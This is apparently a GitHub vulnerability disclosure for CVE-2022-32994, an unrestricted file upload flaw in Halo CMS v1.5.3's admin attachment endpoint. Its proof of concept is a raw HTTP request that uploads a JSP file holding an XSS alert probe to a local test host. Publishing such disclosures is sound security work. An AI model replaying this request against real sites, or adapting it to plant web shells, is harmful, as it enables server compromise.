Headline
CVE-2022-32994: Halo cms v1.5.3 has an arbitrary format file upload vulnerability at /api/admin/attachments/upload · Issue #1 · zongdeiqianxing/cve-reports
Halo CMS v1.5.3 was discovered to contain an arbitrary file upload vulnerability via the component /api/admin/attachments/upload.
https://github.com/halo-dev/halo/
Halo cms v1.5.3 has an arbitrary format file upload vulnerability at /api/admin/attachments/upload. Attackers can upload files in formats such as jsp、html etc.
Proof of Concept
POST /api/admin/attachments/upload HTTP/1.1
Host: 127.0.0.1:8090
Content-Length: 219
Admin-Authorization: 244a0b5340d943ffb8be55bbf3c0db2f
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFxTUuVBMVJqfHQHX
Origin: http://127.0.0.1:8090
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:8090/admin/index.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=node04b75v93fl79m6b5ujcpwcvp82.node0
Connection: close
------WebKitFormBoundaryFxTUuVBMVJqfHQHX
Content-Disposition: form-data; name="file"; filename="2.jsp"
Content-Type: application/octet-stream
1<script>alert(1)</script>
------WebKitFormBoundaryFxTUuVBMVJqfHQHX--
permalink: AttachmentServiceImpl.java L110
Security is not checked in the relevant code